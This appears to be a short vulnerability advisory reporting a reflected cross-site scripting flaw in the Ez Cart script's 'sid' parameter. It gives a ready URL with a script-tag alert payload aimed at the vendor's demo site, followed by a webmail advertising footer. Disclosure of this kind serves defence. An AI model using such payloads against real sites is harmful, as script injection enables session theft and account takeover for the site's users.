Ez Cart suffers from a cross site scripting vulnerability.
815a275031c9829c8f9cb02577d4aefac9ebb3458aef586515180c92da4d4517
#=========================
#Author : anti-gov
#contact: anti-gov[at]hotmail.com
#=========================
script:Ez Cart
vendor:http://www.scriptsez.net
Exploit:
http://localhost/index.php?action=showcat&cid=1&sid=[XSS]
demo:
http://www.scriptsez.com/ezcart_demo/index.php?action=showcat&cid=1&sid="><script>alert(1)</script>
_________________________________________________________________
Windows Live Hotmail: Your friends can get your Facebook updates, right from Hotmail®.
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_4:092009